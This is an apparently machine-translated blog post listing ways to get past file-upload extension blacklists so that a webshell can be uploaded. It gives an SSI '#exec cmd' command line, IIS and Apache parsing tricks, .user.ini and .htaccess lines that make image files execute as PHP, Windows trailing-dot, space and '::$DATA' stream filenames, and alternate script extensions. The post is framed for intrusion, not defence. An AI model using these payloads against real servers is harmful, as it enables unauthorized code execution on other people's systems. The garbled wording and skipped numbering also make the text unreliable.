File Upload blacklist verification bypass

As the code of audit or file infiltration article upload sometimes encounter blacklist verification code , such as the general script name ASP php jsp This is not allowed to upload , here is my summary of some of the methods of bypassing

Shtml

<!--#includefile = "/home/www/user8534/nav_foot.htm"-// can be used to read files

<!--#exec cmd= "ifconfig" and// can be used to execute commands

IIS parsing

sanr.php;. Gif

sanr.asp;. Jpg

Sanr.asp/sanr.jpg

. User.ini

User.ini

Auto_prepend_file: Specify the code to execute before each PHP page executes

auto_prepend_file=demo.gif ( each page will load Demo.gif)

. htaccess

addtypeapplication/x-httpd-php. jpg

Window Properties

2. Use spaces demo.php spaces

4. decimal point to bypass demo.php.

6. Ads data stream demo.php:: $DATA

8. Ads data stream (but file is empty) demo.php:jpg

Window The wildcard demo.<<< the two together to get Webshell

Tips : Direct use of 3 can only extend the next window wildcard character method

Window wildcards can include c:window/temp directory temporary PHP files when containing files (the file contains local test success but the actual infiltration is very rarely successful because the session file is also PHP at the beginning of the same time to match multiple files at the beginning of PHP, will get the first PHP file , do not make sure it is the temporary file you upload)

case -insensitive bypass

ASp pHp JsP

Extension Bypass

ASP:asa CER CDX

Aspx:ashx asmx ascx

PHP:PHP3 phtml

Jsp:jspx JSPF

Apache 's parsing

sanr.php.xxxxxx

This article is from the "Sanr" blog, make sure to keep this source http://0x007.blog.51cto.com/6330498/1694928

File Upload blacklist verification bypass